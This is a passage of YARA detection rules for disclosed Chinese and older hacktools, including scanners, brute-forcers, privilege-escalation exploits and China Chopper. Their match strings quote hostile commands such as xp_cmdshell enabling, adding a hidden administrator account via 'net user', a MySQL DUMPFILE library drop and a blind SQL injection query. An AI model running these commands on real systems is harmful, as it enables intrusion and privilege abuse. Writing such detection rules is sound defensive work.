   		date = "23.11.14"   
   		score = 60   
   		hash = "bace2c65ea67ac4725cb24aa9aee7c2bec6465d7"   
   	strings:   
   		$s0 = "RangeScan.EXE" fullword wide   
   		$s4 = "<br><p align=\"center\"><b>RangeScan " fullword ascii   
   		$s9 = "Produced by isn0" fullword ascii   
   		$s10 = "RangeScan" fullword wide   
   		$s20 = "%d-%d-%d %d:%d:%d" fullword ascii   
   	condition:   
   		3 of them   
rule sig_238_iecv {   
   	meta:   
   		description = "Disclosed hacktool set (old stuff) - file iecv.exe"   
   		author = "Florian Roth"   
   		date = "23.11.14"   
   		score = 60   
   		hash = "6e6e75350a33f799039e7a024722cde463328b6d"   
   	strings:   
   		$s1 = "Edit The Content Of Cookie " fullword wide   
   		$s3 = "Accessories\\wordpad.exe" fullword ascii   
   		$s4 = "gorillanation.com" fullword ascii   
   		$s5 = "Before editing the content of a cookie, you should close all windows of Internet" ascii   
   		$s12 = "http://nirsoft.cjb.net" fullword ascii   
   	condition:   
   		all of them   
rule Dll_LoadEx {   
   	meta:   
   		description = "Chinese Hacktool Set - file Dll_LoadEx.exe"   
   		author = "Florian Roth"   
   		reference = "http://tools.zjqhr.com/"   
   		date = "2015-06-13"   
   		hash = "213d9d0afb22fe723ff570cf69ff8cdb33ada150"   
   	strings:   
   		$s0 = "WiNrOOt@126.com" fullword wide   
   		$s1 = "Dll_LoadEx.EXE" fullword wide   
   		$s3 = "You Already Loaded This DLL ! :(" fullword ascii   
   		$s10 = "Dll_LoadEx Microsoft " fullword wide   
   		$s17 = "Can't Load This Dll ! :(" fullword ascii   
   		$s18 = "WiNrOOt" fullword wide   
   		$s20 = " Dll_LoadEx(&A)..." fullword wide   
   	condition:   
   		uint16(0) == 0x5a4d and filesize < 120KB and 3 of them   
rule Tools_xport {   
   	meta:   
   		description = "Chinese Hacktool Set - file xport.exe"   
   		author = "Florian Roth"   
   		reference = "http://tools.zjqhr.com/"   
   		date = "2015-06-13"   
   		hash = "9584de562e7f8185f721e94ee3cceac60db26dda"   
   	strings:   
   		$s1 = "Match operate system failed, 0x%00004X:%u:%d(Window:TTL:DF)" fullword ascii   
   		$s2 = "Example: xport www.xxx.com 80 -m syn" fullword ascii   
   		$s3 = "%s - command line port scanner" fullword ascii   
   		$s4 = "xport 192.168.1.1 1-1024 -t 200 -v" fullword ascii   
   		$s5 = "Usage: xport <Host> <Ports Scope> [Options]" fullword ascii   
   		$s6 = ".\\port.ini" fullword ascii   
   		$s7 = "Port scan complete, total %d port, %d port is opened, use %d ms." fullword ascii   
   		$s8 = "Code by glacier <glacier@xfocus.org>" fullword ascii   
   		$s9 = "http://www.xfocus.org" fullword ascii   
   	condition:   
   		uint16(0) == 0x5a4d and filesize < 100KB and 2 of them   
rule ArtTrayHookDll {   
   	meta:   
   		description = "Disclosed hacktool set (old stuff) - file ArtTrayHookDll.dll"   
   		author = "Florian Roth"   
   		date = "23.11.14"   
   		score = 60   
   		hash = "4867214a3d96095d14aa8575f0adbb81a9381e6c"   
   	strings:   
   		$s0 = "ArtTrayHookDll.dll" fullword ascii   
   		$s7 = "?TerminateHook@@YAXXZ" fullword ascii   
   	condition:   
   		all of them   
rule Dos_ch {   
   	meta:   
   		description = "Chinese Hacktool Set - file ch.exe"   
   		author = "Florian Roth"   
   		reference = "http://tools.zjqhr.com/"   
   		date = "2015-06-13"   
   		hash = "60bbb87b08af840f21536b313a76646e7c1f0ea7"   
   	strings:   
   		$s0 = "/Churraskito/-->Usage: Churraskito.exe \"command\" " fullword ascii   
   		$s4 = "fuck,can't find WMI process PID." fullword ascii   
   		$s5 = "/Churraskito/-->Found token %s " fullword ascii   
   		$s8 = "wmiprvse.exe" fullword ascii   
   		$s10 = "SELECT * FROM IIsWebInfo" fullword ascii   
   		$s17 = "WinSta0\\Default" fullword ascii  /* Goodware String - occured 22 times */   
   	condition:   
   		uint16(0) == 0x5a4d and filesize < 260KB and 3 of them   
rule EditServer_HackTool {   
   	meta:   
   		description = "Disclosed hacktool set (old stuff) - file EditServer.exe"   
   		author = "Florian Roth"   
   		date = "23.11.14"   
   		score = 60   
   		hash = "87b29c9121cac6ae780237f7e04ee3bc1a9777d3"   
   	strings:   
   		$s0 = "%s Server.exe" fullword ascii   
   		$s1 = "Service Port: %s" fullword ascii   
   		$s2 = "The Port Must Been >0 & <65535" fullword ascii   
   		$s8 = "3--Set Server Port" fullword ascii   
   		$s9 = "The Server Password Exceeds 32 Characters" fullword ascii   
   		$s13 = "Service Name: %s" fullword ascii   
   		$s14 = "Server Password: %s" fullword ascii   
   		$s17 = "Inject Process Name: %s" fullword ascii   
      
   		$x1 = "WinEggDrop Shell Congirator" fullword ascii   
   	condition:   
   		5 of ($s*) or $x1   
rule epathobj_exp32 {   
   	meta:   
   		description = "Chinese Hacktool Set - file epathobj_exp32.exe"   
   		author = "Florian Roth"   
   		reference = "http://tools.zjqhr.com/"   
   		date = "2015-06-13"   
   		hash = "ed86ff44bddcfdd630ade8ced39b4559316195ba"   
   	strings:   
   		$s0 = "Watchdog thread %d waiting on Mutex" fullword ascii   
   		$s1 = "Exploit ok run command" fullword ascii   
   		$s2 = "\\epathobj_exp\\Release\\epathobj_exp.pdb" fullword ascii   
   		$s3 = "Alllocated userspace PATHRECORD () %p" fullword ascii   
   		$s4 = "Mutex object did not timeout, list not patched" fullword ascii   
   	condition:   
   		uint16(0) == 0x5a4d and filesize < 270KB and all of them   
rule MarathonTool {   
   	meta:   
   		description = "Chinese Hacktool Set - file MarathonTool.exe"   
   		author = "Florian Roth"   
   		reference = "http://tools.zjqhr.com/"   
   		date = "2015-06-13"   
   		hash = "084a27cd3404554cc799d0e689f65880e10b59e3"   
   	strings:   
   		$s0 = "MarathonTool" ascii   
   		$s17 = "/Blind SQL injection tool based in heavy queries" fullword ascii   
   		$s18 = "SELECT UNICODE(SUBSTRING((system_user),{0},1))" fullword wide   
   	condition:   
   		uint16(0) == 0x5a4d and filesize < 1040KB and all of them   
rule scanms_scanms {   
   	meta:   
   		description = "Chinese Hacktool Set - file scanms.exe"   
   		author = "Florian Roth"   
   		reference = "http://tools.zjqhr.com/"   
   		date = "2015-06-13"   
   		hash = "47787dee6ddea2cb44ff27b6a5fd729273cea51a"   
   	strings:   
   		$s1 = "--- ScanMs Tool --- (c) 2003 Internet Security Systems ---" fullword ascii   
   		$s2 = "Scans for systems vulnerable to MS03-026 vuln" fullword ascii   
   		$s3 = "More accurate for WinXP/Win2k, less accurate for WinNT" fullword ascii /* PEStudio Blacklist: os */   
   		$s4 = "added %d.%d.%d.%d-%d.%d.%d.%d" fullword ascii   
   		$s5 = "Internet Explorer 1.0" fullword ascii   
   	condition:   
   		uint16(0) == 0x5a4d and filesize < 300KB and 3 of them   
rule CN_Toolset__XScanLib_XScanLib_XScanLib {   
   	meta:   
   		description = "Detects a Chinese hacktool from a disclosed toolset - from files XScanLib.dll, XScanLib.dll, XScanLib.dll"   
   		author = "Florian Roth"   
   		reference = "http://qiannao.com/ls/905300366/33834c0c/"   
   		reference2 = "https://raw.githubusercontent.com/Neo23x0/Loki/master/signatures/thor-hacktools.yar"   
   		date = "2015/03/30"   
   		score = 70   
   		super_rule = 1   
   		hash0 = "af419603ac28257134e39683419966ab3d600ed2"   
   		hash1 = "c5cb4f75cf241f5a9aea324783193433a42a13b0"   
   		hash2 = "135f6a28e958c8f6a275d8677cfa7cb502c8a822"   
   	strings:   
   		$s1 = "Plug-in thread causes an exception, failed to alert user." fullword   
   		$s2 = "PlugGetUdpPort" fullword   
   		$s3 = "XScanLib.dll" fullword   
   		$s4 = "PlugGetTcpPort" fullword   
   		$s11 = "PlugGetVulnNum" fullword   
   	condition:   
   		all of them   
rule ArtTray_zip_Folder_ArtTray {   
   	meta:   
   		description = "Disclosed hacktool set (old stuff) - file ArtTray.exe"   
   		author = "Florian Roth"   
   		date = "23.11.14"   
   		score = 60   
   		hash = "ee1edc8c4458c71573b5f555d32043cbc600a120"   
   	strings:   
   		$s0 = "http://www.brigsoft.com" fullword wide   
   		$s2 = "ArtTrayHookDll.dll" fullword ascii   
   		$s3 = "ArtTray Version 1.0 " fullword wide   
   		$s16 = "TRM_HOOKCALLBACK" fullword ascii   
   	condition:   
   		all of them   
rule LinuxHacktool_eyes_scanssh {   
   	meta:   
   		description = "Linux hack tools - file scanssh"   
   		author = "Florian Roth"   
   		reference = "not set"   
   		date = "2015/01/19"   
   		hash = "467398a6994e2c1a66a3d39859cde41f090623ad"   
   	strings:   
   		$s0 = "Connection closed by remote host" fullword ascii   
   		$s1 = "Writing packet : error on socket (or connection closed): %s" fullword ascii   
   		$s2 = "Remote connection closed by signal SIG%s %s" fullword ascii   
   		$s4 = "Reading private key %s failed (bad passphrase ?)" fullword ascii   
   		$s5 = "Server closed connection" fullword ascii   
   		$s6 = "%s: line %d: list delimiter not followed by keyword" fullword ascii   
   		$s8 = "checking for version `%s' in file %s required by file %s" fullword ascii   
   		$s9 = "Remote host closed connection" fullword ascii   
   		$s10 = "%s: line %d: bad command `%s'" fullword ascii   
   		$s13 = "verifying that server is a known host : file %s not found" fullword ascii   
   		$s14 = "%s: line %d: expected service, found `%s'" fullword ascii   
   		$s15 = "%s: line %d: list delimiter not followed by domain" fullword ascii   
   		$s17 = "Public key from server (%s) doesn't match user preference (%s)" fullword ascii   
   	condition:   
   		all of them   
rule CookieTools {   
   	meta:   
   		description = "Chinese Hacktool Set - file CookieTools.exe"   
   		author = "Florian Roth"   
   		reference = "http://tools.zjqhr.com/"   
   		date = "2015-06-13"   
   		hash = "b6a3727fe3d214f4fb03aa43fb2bc6fadc42c8be"   
   	strings:   
   		$s0 = "http://210.73.64.88/doorway/cgi-bin/getclientip.asp?IP=" fullword ascii   
   		$s2 = "No data to read.$Can not bind in port range (%d - %d)" fullword wide   
   		$s3 = "Connection Closed Gracefully.;Could not bind socket. Address and port are alread" wide   
   		$s8 = "OnGetPasswordP" fullword ascii   
   		$s12 = "http://www.chinesehack.org/" fullword ascii   
   	condition:   
   		uint16(0) == 0x5a4d and filesize < 5000KB and 2 of them   
rule Hacktools_CN_Burst_sql {   
   	meta:   
   		description = "Disclosed hacktool set - file sql.exe"   
   		author = "Florian Roth"   
   		date = "17.11.14"   
   		score = 60   
   		hash = "d5139b865e99b7a276af7ae11b14096adb928245"   
   	strings:   
   		$s0 = "s.exe %s %s %s %s %d /save" fullword ascii   
   		$s2 = "s.exe start error...%d" fullword ascii   
   		$s4 = "EXEC sp_addextendedproc xp_cmdshell,'xplog70.dll'" fullword ascii   
   		$s7 = "EXEC master..xp_cmdshell 'wscript.exe cc.js'" fullword ascii   
   		$s10 = "Result.txt" fullword ascii   
   		$s11 = "Usage:sql.exe [options]" fullword ascii   
   		$s17 = "%s root %s %d error" fullword ascii   
   		$s18 = "Pass.txt" fullword ascii   
   		$s20 = "SELECT sillyr_at_gmail_dot_com INTO DUMPFILE '%s\\\\sillyr_x.so' FROM sillyr_x" fullword ascii   
   	condition:   
   		6 of them   
rule ChinaChopper_caidao {   
   	meta:   
   		description = "Chinese Hacktool Set - file caidao.exe"   
   		author = "Florian Roth"   
   		reference = "http://tools.zjqhr.com/"   
   		date = "2015-06-13"   
   		hash = "056a60ec1f6a8959bfc43254d97527b003ae5edb"   
   	strings:   
   		$s1 = "Pass,Config,n{)" fullword ascii   
   		$s2 = "phMYSQLZ" fullword ascii   
   		$s3 = "\\DHLP\\." fullword ascii   
   		$s4 = "\\dhlp\\." fullword ascii   
   		$s5 = "SHAutoComple" fullword ascii   
   		$s6 = "MainFrame" ascii   
   	condition:   
   		uint16(0) == 0x5a4d and filesize < 1077KB and all of them   
rule iam_iamdll : Toolkit  {   
   	meta:   
   		description = "Auto-generated rule - file iamdll.dll"   
   		author = "Florian Roth"   
   		reference = "http://www.coresecurity.com/corelabs-research/open-source-tools/pass-hash-toolkit"   
   		date = "2015-07-10"   
   		score = 80   
   		hash = "892de92f71941f7b9e550de00a57767beb7abe1171562e29428b84988cee6602"   
   	strings:   
   		$s0 = "LSASRV.DLL" fullword ascii /* score: '21.00' */   
   		$s1 = "iamdll.dll" fullword ascii /* score: '21.00' */   
   		$s2 = "ChangeCreds" fullword ascii /* score: '12.00' */   
   	condition:   
   		uint16(0) == 0x5a4d and filesize < 115KB and all of them   
rule hydra_7_4_1_hydra {   
   	meta:   
   		description = "Chinese Hacktool Set - file hydra.exe"   
   		author = "Florian Roth"   
   		reference = "http://tools.zjqhr.com/"   
   		date = "2015-06-13"   
   		hash = "3411d0380a1c1ebf58a454765f94d4f1dd714b5b"   
   	strings:   
   		$s1 = "%d of %d target%s%scompleted, %lu valid password%s found" fullword ascii   
   		$s2 = "[%d][smb] Host: %s Account: %s Error: ACCOUNT_CHANGE_PASSWORD" fullword ascii   
   		$s3 = "hydra -P pass.txt target cisco-enable  (direct console access)" fullword ascii   
   		$s4 = "[%d][smb] Host: %s Account: %s Error: PASSWORD EXPIRED" fullword ascii   
   		$s5 = "[ERROR] SMTP LOGIN AUTH, either this auth is disabled" fullword ascii   
   		$s6 = "\"/login.php:user=^USER^&pass=^PASS^&mid=123:incorrect\"" fullword ascii   
   	condition:   
   		uint16(0) == 0x5a4d and filesize < 1000KB and 2 of them   
rule ASPack_Chinese {   
   	meta:   
   		description = "Disclosed hacktool set (old stuff) - file ASPack Chinese.ini"   
   		author = "Florian Roth"   
   		date = "23.11.14"   
   		score = 60   
   		hash = "02a9394bc2ec385876c4b4f61d72471ac8251a8e"   
   	strings:   
   		$s0 = "= Click here if you want to get your registered copy of ASPack" fullword ascii   
   		$s1 = ";  For beginning of translate - copy english.ini into the yourlanguage.ini" fullword ascii   
   		$s2 = "E-Mail:                      shinlan@km169.net" fullword ascii   
   		$s8 = ";  Please, translate text only after simbol '='" fullword ascii   
   		$s19 = "= Compress with ASPack" fullword ascii   
   	condition:   
   		all of them   
rule Dos_sys {   
   	meta:   
   		description = "Chinese Hacktool Set - file sys.exe"   
   		author = "Florian Roth"   
   		reference = "http://tools.zjqhr.com/"   
   		date = "2015-06-13"   
   		hash = "b5837047443f8bc62284a0045982aaae8bab6f18"   
   	strings:   
   		$s0 = "'SeDebugPrivilegeOpen " fullword ascii   
   		$s6 = "Author: Cyg07*2" fullword ascii   
   		$s12 = "from golds7n[LAG]'J" fullword ascii   
   		$s14 = "DAMAGE" fullword ascii   
   	condition:   
   		uint16(0) == 0x5a4d and filesize < 150KB and all of them   
rule iKAT_Tool_Generic {   
   	meta:   
   		description = "Generic Rule for hack tool iKAT files gpdisable.exe, kitrap0d.exe, uacpoc.exe"   
   		author = "Florian Roth"   
   		date = "05.11.14"   
   		score = 55   
   		reference = "http://ikat.ha.cked.net/Windows/functions/ikatfiles.html"   
   		super_rule = 1   
   		hash0 = "814c126f21bc5e993499f0c4e15b280bf7c1c77f"   
   		hash1 = "75f5aed1e719443a710b70f2004f34b2fe30f2a9"   
   		hash2 = "b65a460d015fd94830d55e8eeaf6222321e12349"   
   	strings:   
   		$s0 = "<IconFile>C:\\WINDOWS\\App.ico</IconFile>" fullword   
   		$s1 = "Failed to read the entire file" fullword   
   		$s4 = "<VersionCreatedBy>14.4.0</VersionCreatedBy>" fullword   
   		$s8 = "<ProgressCaption>Run &quot;executor.bat&quot; once the shell has spawned.</P"   
   		$s9 = "Running Zip pipeline..." fullword   
   		$s10 = "<FinTitle />" fullword   
   		$s12 = "<AutoTemp>0</AutoTemp>" fullword   
   		$s14 = "<DefaultDir>%TEMP%</DefaultDir>" fullword   
   		$s15 = "AES Encrypting..." fullword   
   		$s20 = "<UnzipDir>%TEMP%</UnzipDir>" fullword   
   	condition:   
   		all of them   
rule iKAT_gpdisable_customcmd_kitrap0d_uacpoc {   
   	meta:   
   		description = "iKAT hack tool set generic rule - from files gpdisable.exe, customcmd.exe, kitrap0d.exe, uacpoc.exe"   
   		author = "Florian Roth"   
   		date = "05.11.14"   
   		reference = "http://ikat.ha.cked.net/Windows/functions/ikatfiles.html"   
   		super_rule = 1   
   		hash0 = "814c126f21bc5e993499f0c4e15b280bf7c1c77f"   
   		hash1 = "2725690954c2ad61f5443eb9eec5bd16ab320014"   
   		hash2 = "75f5aed1e719443a710b70f2004f34b2fe30f2a9"   
   		hash3 = "b65a460d015fd94830d55e8eeaf6222321e12349"   
   		score = 20   
   	strings:   
   		$s0 = "Failed to get temp file for source AES decryption" fullword   
   		$s5 = "Failed to get encryption header for pwd-protect" fullword   
   		$s17 = "Failed to get filetime" fullword   
   		$s20 = "Failed to delete temp file for password decoding (3)" fullword   
   	condition:   
   		all of them   
rule Powershell_Netcat {   
   	meta:   
   		description = "Detects a Powershell version of the Netcat network hacking tool"   
   		author = "Florian Roth"   
   		score = 60   
   		date = "10.10.2014"   
   	strings:   
   		$s0 = "[ValidateRange(1, 65535)]" fullword   
   		$s1 = "$Client = New-Object -TypeName System.Net.Sockets.TcpClient" fullword   
   		$s2 = "$Buffer = New-Object -TypeName System.Byte[] -ArgumentList $Client.ReceiveBufferSize" fullword   
   	condition:   
   		all of them   
rule VUBrute_VUBrute {   
   	meta:   
   		description = "PoS Scammer Toolbox - http://goo.gl/xiIphp - file VUBrute.exe"   
   		author = "Florian Roth"   
   		date = "22.11.14"   
   		score = 70   
   		hash = "166fa8c5a0ebb216c832ab61bf8872da556576a7"   
   	strings:   
   		$s0 = "Text Files (*.txt);;All Files (*)" fullword ascii   
   		$s1 = "http://ubrute.com" fullword ascii   
   		$s11 = "IP - %d; Password - %d; Combination - %d" fullword ascii   
   		$s14 = "error.txt" fullword ascii   
   	condition:   
   		all of them   
rule pw_inspector_2 {   
   	meta:   
   		description = "Chinese Hacktool Set - file pw-inspector.exe"   
   		author = "Florian Roth"   
   		reference = "http://tools.zjqhr.com/"   
   		date = "2015-06-13"   
   		hash = "e0a1117ee4a29bb4cf43e3a80fb9eaa63bb377bf"   
   	strings:   
   		$s1 = "Use for hacking: trim your dictionary file to the pw requirements of the target." fullword ascii   
   		$s2 = "Syntax: %s [-i FILE] [-o FILE] [-m MINLEN] [-M MAXLEN] [-c MINSETS] -l -u -n -p " ascii   
   		$s3 = "PW-Inspector" fullword ascii   
   		$s4 = "i:o:m:M:c:lunps" fullword ascii   
   	condition:   
   		uint16(0) == 0x5a4d and filesize < 100KB and 2 of them   
rule Chinese_Hacktool_1014 {   
   	meta:   
   		description = "Detects a chinese hacktool with unknown use"   
   		author = "Florian Roth"   
   		score = 60   
   		date = "10.10.2014"   
   		hash = "98c07a62f7f0842bcdbf941170f34990"   
   	strings:   
   		$s0 = "IEXT2_IDC_HORZLINEMOVECURSOR" fullword wide   
   		$s1 = "msctls_progress32" fullword wide   
   		$s2 = "Reply-To: %s" fullword ascii   
   		$s3 = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" fullword ascii   
   		$s4 = "html htm htx asp" fullword ascii   
   	condition:   
   		all of them   
rule DomainScanV1_0 {   
   	meta:   
   		description = "Auto-generated rule on file DomainScanV1_0.exe"   
   		author = "yarGen Yara Rule Generator by Florian Roth"   
   		hash = "aefcd73b802e1c2bdc9b2ef206a4f24e"   
   	strings:   
   		$s0 = "dIJMuX$aO-EV"   
   		$s1 = "XELUxP\"-\\"   
   		$s2 = "KaR\"U'}-M,."   
   		$s3 = "V.)\\ZDxpLSav"   
   		$s4 = "Decompress error"   
   		$s5 = "Can't load library"   
   		$s6 = "Can't load function"   
   		$s7 = "com0tl32:.d"   
   	condition:   
   		all of them   
rule Hacktools_CN_Burst_Start {   
   	meta:   
   		description = "Disclosed hacktool set - file Start.bat - DoS tool"   
   		author = "Florian Roth"   
   		date = "17.11.14"   
   		score = 60   
   		hash = "75d194d53ccc37a68286d246f2a84af6b070e30c"   
   	strings:   
   		$s0 = "for /f \"eol= tokens=1,2 delims= \" %%i in (ip.txt) do (" fullword ascii   
   		$s1 = "Blast.bat /r 600" fullword ascii   
   		$s2 = "Blast.bat /l Blast.bat" fullword ascii   
   		$s3 = "Blast.bat /c 600" fullword ascii   
   		$s4 = "start Clear.bat" fullword ascii   
   		$s5 = "del Result.txt" fullword ascii   
   		$s6 = "s syn %%i %%j 3306 /save" fullword ascii   
   		$s7 = "start Thecard.bat" fullword ascii   
   		$s10 = "setlocal enabledelayedexpansion" fullword ascii   
   	condition:   
   		5 of them   
rule LinuxHacktool_eyes_screen {   
   	meta:   
   		description = "Linux hack tools - file screen"   
   		author = "Florian Roth"   
   		reference = "not set"   
   		date = "2015/01/19"   
   		hash = "a240a0118739e72ff89cefa2540bf0d7da8f8a6c"   
   	strings:   
   		$s0 = "or: %s -r [host.tty]" fullword ascii   
   		$s1 = "%s: process: character, ^x, or (octal) \\032 expected." fullword ascii   
   		$s2 = "Type \"screen [-d] -r [pid.]tty.host\" to resume one of them." fullword ascii   
   		$s6 = "%s: at [identifier][%%|*|#] command [args]" fullword ascii   
   		$s8 = "Slurped only %d characters (of %d) into buffer - try again" fullword ascii   
   		$s11 = "command from %s: %s %s" fullword ascii   
   		$s16 = "[ Passwords don't match - your armor crumbles away ]" fullword ascii   
   		$s19 = "[ Passwords don't match - checking turned off ]" fullword ascii   
   	condition:   
   		all of them   
rule IP_Stealing_Utilities {   
   	meta:   
   		description = "Auto-generated rule on file IP Stealing Utilities.exe"   
   		author = "yarGen Yara Rule Generator by Florian Roth"   
   		hash = "65646e10fb15a2940a37c5ab9f59c7fc"   
   	strings:   
   		$s0 = "DarkKnight"   
   		$s9 = "IPStealerUtilities"   
   	condition:   
   		all of them   
rule CN_Packed_Scanner {   
   	meta:   
   		description = "Suspiciously packed executable"   
   		author = "Florian Roth"   
   		hash = "6323b51c116a77e3fba98f7bb7ff4ac6"   
   		score = 40   
   		date = "06.10.2014"   
   	strings:   
   		$s1 = "kernel32.dll" fullword ascii   
   		$s2 = "CRTDLL.DLL" fullword ascii   
   		$s3 = "__GetMainArgs" fullword ascii   
   		$s4 = "WS2_32.DLL" fullword ascii   
   	condition:   
   		all of them and filesize < 180KB and filesize > 70KB   
rule QQ_zip_Folder_QQ {   
   	meta:   
   		description = "Disclosed hacktool set (old stuff) - file QQ.exe"   
   		author = "Florian Roth"   
   		date = "23.11.14"   
   		score = 60   
   		hash = "9f8e3f40f1ac8c1fa15a6621b49413d815f46cfb"   
   	strings:   
   		$s0 = "EMAIL:haoq@neusoft.com" fullword wide   
   		$s1 = "EMAIL:haoq@neusoft.com" fullword wide   
   		$s4 = "QQ2000b.exe" fullword wide   
   		$s5 = "haoq@neusoft.com" fullword ascii   
   		$s9 = "QQ2000b.exe" fullword ascii   
   		$s10 = "\\qq2000b.exe" fullword ascii   
   		$s12 = "WINDSHELL STUDIO[WINDSHELL " fullword wide   
   		$s17 = "SOFTWARE\\HAOQIANG\\" fullword ascii   
   	condition:   
   		5 of them   
rule _iissample_nesscan_twwwscan {   
   	meta:   
   		description = "Disclosed hacktool set (old stuff) - from files iissample.exe, nesscan.exe, twwwscan.exe"   
   		author = "Florian Roth"   
   		date = "23.11.14"   
   		score = 60   
   		super_rule = 1   
   		hash0 = "7f20962bbc6890bf48ee81de85d7d76a8464b862"   
   		hash1 = "c0b1a2196e82eea4ca8b8c25c57ec88e4478c25b"   
   		hash2 = "548f0d71ef6ffcc00c0b44367ec4b3bb0671d92f"   
   	strings:   
   		$s0 = "Connecting HTTP Port - Result: " fullword   
   		$s1 = "No space for command line argument vector" fullword   
   		$s3 = "Microsoft(July/1999~) http://www.microsoft.com/technet/security/current.asp" fullword   
   		$s5 = "No space for copy of command line" fullword   
   		$s7 = "-  Windows NT,2000 Patch Method  - " fullword   
   		$s8 = "scanf : floating point formats not linked" fullword   
   		$s12 = "hrdir_b.c: LoadLibrary != mmdll borlndmm failed" fullword   
   		$s13 = "!\"what?\"" fullword   
   		$s14 = "%s Port %d Closed" fullword   
   		$s16 = "printf : floating point formats not linked" fullword   
   		$s17 = "xxtype.cpp" fullword   
   	condition:   
   		all of them   
rule Tools_scan {   
   	meta:   
   		description = "Chinese Hacktool Set - file scan.exe"   
   		author = "Florian Roth"   
   		reference = "http://tools.zjqhr.com/"   
   		date = "2015-06-13"   
   		hash = "c580a0cc41997e840d2c0f83962e7f8b636a5a13"   
   	strings:   
   		$s2 = "Shanlu Studio" fullword wide   
   		$s3 = "_AutoAttackMain" fullword ascii   
   		$s4 = "_frmIpToAddr" fullword ascii   
   	condition:   
   		uint16(0) == 0x5a4d and filesize < 3000KB and all of them   
rule sig_238_TFTPD32 {   
   	meta:   
   		description = "Disclosed hacktool set (old stuff) - file TFTPD32.EXE"   
   		author = "Florian Roth"   
   		date = "23.11.14"   
   		score = 60   
   		hash = "5c5f8c1a2fa8c26f015e37db7505f7c9e0431fe8"   
   	strings:   
   		$s0 = " http://arm.533.net" fullword ascii   
   		$s1 = "Tftpd32.hlp" fullword ascii   
   		$s2 = "Timeouts and Ports should be numerical and can not be 0" fullword ascii   
   		$s3 = "TFTPD32 -- " fullword wide   
   		$s4 = "%d -- %s" fullword ascii   
   		$s5 = "TIMEOUT while waiting for Ack block %d. file <%s>" fullword ascii   
   		$s12 = "TftpPort" fullword ascii   
   		$s13 = "Ttftpd32BackGround" fullword ascii   
   		$s17 = "SOFTWARE\\TFTPD32" fullword ascii   
   	condition:   
   		all of them   
rule CN_Hacktool_SSPort_Portscanner {   
   	meta:   
   		description = "Detects a chinese Portscanner named SSPort"   
   		author = "Florian Roth"   
   		score = 70   
   		date = "12.10.2014"   
   	strings:   
   		$s0 = "Golden Fox" fullword wide   
   		$s1 = "Syn Scan Port" fullword wide   
   		$s2 = "CZ88.NET" fullword wide   
   	condition:   
   		all of them   
rule iKAT_tools_nmap {   
   	meta:   
   		description = "Generic rule for NMAP - based on NMAP 4 standalone"   
   		author = "Florian Roth"   
   		date = "05.11.14"   
   		score = 50   
   		reference = "http://ikat.ha.cked.net/Windows/functions/ikatfiles.html"   
   		hash = "d0543f365df61e6ebb5e345943577cc40fca8682"   
   	strings:   
   		$s0 = "Insecure.Org" fullword wide   
   		$s1 = "Copyright (c) Insecure.Com" fullword wide   
   		$s2 = "nmap" fullword nocase   
   		$s3 = "Are you alert enough to be using Nmap?  Have some coffee or Jolt(tm)." ascii   
   	condition:   
   		all of them   
rule arpsniffer {   
   	meta:   
   		description = "Chinese Hacktool Set - file arpsniffer.exe"   
   		author = "Florian Roth"   
   		reference = "http://tools.zjqhr.com/"   
   		date = "2015-06-13"   
   		hash = "7d8753f56fc48413fc68102cff34b6583cb0066c"   
   	strings:   
   		$s1 = "SHELL" ascii   
   		$s2 = "PacketSendPacket" fullword ascii   
   		$s3 = "ArpSniff" ascii   
   		$s4 = "pcap_loop" fullword ascii  /* Goodware String - occured 3 times */   
   		$s5 = "packet.dll" fullword ascii  /* Goodware String - occured 4 times */   
   	condition:   
   		uint16(0) == 0x5a4d and filesize < 120KB and all of them   
rule Arp_EMP_v1_0 {   
   	meta:   
   		description = "Chinese Hacktool Set - file Arp EMP v1.0.exe"   
   		author = "Florian Roth"   
   		reference = "http://tools.zjqhr.com/"   
   		date = "2015-06-13"   
   		hash = "ae4954c142ad1552a2abaef5636c7ef68fdd99ee"   
   	strings:   
   		$s0 = "Arp EMP v1.0.exe" fullword wide   
   	condition:   
   		uint16(0) == 0x5a4d and filesize < 800KB and all of them   
rule CN_Tools_hscan {   
   	meta:   
   		description = "Chinese Hacktool Set - file hscan.exe"   
   		author = "Florian Roth"   
   		reference = "http://tools.zjqhr.com/"   
   		date = "2015-06-13"   
   		hash = "17a743e40790985ececf5c66eaad2a1f8c4cffe8"   
   	strings:   
   		$s1 = "%s -f hosts.txt -port -ipc -pop -max 300,20 -time 10000" fullword ascii   
   		$s2 = "%s -h 192.168.0.1 192.168.0.254 -port -ftp -max 200,20" fullword ascii   
   		$s3 = "%s -h www.target.com -all" fullword ascii   
   		$s4 = ".\\report\\%s-%s.html" fullword ascii   
   		$s5 = ".\\log\\Hscan.log" fullword ascii   
   		$s6 = "[%s]: Found cisco Enable password: %s !!!" fullword ascii   
   		$s7 = "%s@ftpscan#FTP Account:  %s/[null]" fullword ascii   
   		$s8 = ".\\conf\\mysql_pass.dic" fullword ascii   
   	condition:   
   		uint16(0) == 0x5a4d and filesize < 300KB and all of them   
rule ustrrefadd {   
   	meta:   
   		description = "Chinese Hacktool Set - file ustrrefadd.dll"   
   		author = "Florian Roth"   
   		reference = "http://tools.zjqhr.com/"   
   		date = "2015-06-13"   
   		hash = "b371b122460951e74094f3db3016264c9c8a0cfa"   
   	strings:   
   		$s0 = "E-Mail  : admin@luocong.com" fullword ascii   
   		$s1 = "Homepage: http://www.luocong.com" fullword ascii   
   		$s2 = ": %d  -  " fullword ascii   
   		$s3 = "ustrreffix.dll" fullword ascii   
   		$s5 = "Ultra String Reference plugin v%d.%02d" fullword ascii   
   	condition:   
   		uint16(0) == 0x5a4d and filesize < 320KB and all of them   
rule FreeVersion_release {   
   	meta:   
   		description = "Chinese Hacktool Set - file release.exe"   
   		author = "Florian Roth"   
   		reference = "http://tools.zjqhr.com/"   
   		date = "2015-06-13"   
   		hash = "f42e4b5748e92f7a450eb49fc89d6859f4afcebb"   
   	strings:   
   		$s1 = "-->Got WMI process Pid: %d " ascii   
   		$s2 = "This exploit will execute \"net user " ascii   
   		$s3 = "net user temp 123456 /add & net localgroup administrators temp /add" fullword ascii   
   		$s4 = "Running reverse shell" ascii   
   		$s5 = "wmiprvse.exe" fullword ascii   
   		$s6 = "SELECT * FROM IIsWebInfo" fullword ascii   
   	condition:   
   		uint16(0) == 0x5a4d and filesize < 100KB and 3 of them   
rule dbexpora {   
   	meta:   
   		description = "Chinese Hacktool Set - file dbexpora.dll"   
   		author = "Florian Roth"   
   		reference = "http://tools.zjqhr.com/"   
   		date = "2015-06-13"   
   		hash = "b55b007ef091b2f33f7042814614564625a8c79f"   
